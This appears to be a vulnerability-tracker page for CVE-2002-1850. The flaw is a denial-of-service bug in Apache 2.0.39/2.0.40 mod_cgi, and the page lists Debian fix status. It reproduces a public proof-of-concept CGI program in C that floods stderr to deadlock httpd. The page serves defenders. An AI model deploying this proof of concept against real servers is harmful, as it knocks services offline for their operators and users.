CVE-2002-1850
Description
mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
Mitigation details
CVE-2002-1850 NameCVE-2002-1850 Descriptionmod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script. SourceCVE (at NVD; CERT, ENISA, LWN, oss-sec, fulldisc, Debian ELTS, Red…
CVE-2002-1850
| Name | CVE-2002-1850 |
| Description | mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script. |
| Source | CVE (at NVD; CERT, ENISA, LWN, oss-sec, fulldisc, Debian ELTS, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, GitHub advisories/code/issues, web search, more) |
Vulnerable and fixed packages
The table below lists information on source packages.
| Source Package | Release | Version | Status |
|---|---|---|---|
| apache2 (PTS) | bullseye | 2.4.62-1~deb11u1 | fixed |
| bullseye (security) | 2.4.67-1~deb11u1 | fixed | |
| bookworm, bookworm (security) | 2.4.67-1~deb12u2 | fixed | |
| trixie (security), trixie | 2.4.67-1~deb13u2 | fixed | |
| forky | 2.4.67-1 | fixed | |
| sid | 2.4.67-2 | fixed |
The information below is based on the following data on fixed versions.
| Package | Type | Release | Fixed Version | Urgency | Origin | Debian Bugs |
|---|---|---|---|---|---|---|
| apache2 | source | (unstable) | 2.0.42-1 |
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Apache 2.0.39/40 - Oversized STDERR Buffer Denial of Service
// source: https://www.securityfocus.com/bid/5787/info
Apache is prone to a denial of service condition when an excessive amount of data is written to stderr. This condition reportedly occurs when the amount of data written to stderr is over the default amount allowed by the operating system.
This may potentially be an issue in web applications that write user-supplied data to stderr. Additionally, locally based attackers may exploit this issue.
This issue has been confirmed in Apache 2.0.39/2.0.40 on Linux operating systems. Apache on other platforms may also be affected. This issue does not appear to be present in versions prior to 2.0.x.
// Credit to: K.C. Wong
#include <stdio.h>
#include <time.h>
#include <unistd.h>
#include <fcntl.h>
#define SIZE 4075
void out_err()
{
char buffer[SIZE];
int i = 0;
for (i = 0; i < SIZE - 1; ++i)
buffer[i] = 'a' + (char )(i % 26);
buffer[SIZE - 1] = '\0';
//
fcntl(2, F_SETFL, fcntl(2, F_GETFL) | O_NONBLOCK);
fprintf(stderr, "short test\n");
fflush(stderr);
fprintf(stderr, "test error=%s\n", buffer);
fflush(stderr);
} // out_err()
int main(int argc, char ** argv)
{
fprintf(stdout, "Context-Type: text/html\r\n");
fprintf(stdout, "\r\n\r\n");
out_err();
fprintf(stdout, "<HTML>\n");
fprintf(stdout, "<body>\n");
fprintf(stdout, "<h1>hello world</h1>\n");
fprintf(stdout, "</body>\n");
fprintf(stdout, "</HTML>\n");
fflush(stdout);
exit(0);
} // main()OS impact
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 2.0.42-1 |
| sid | Fixed | 2.0.42-1 |
| forky | Fixed | 2.0.42-1 |
| bullseye | Fixed | 2.0.42-1 |
| bookworm | Fixed | 2.0.42-1 |
References
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.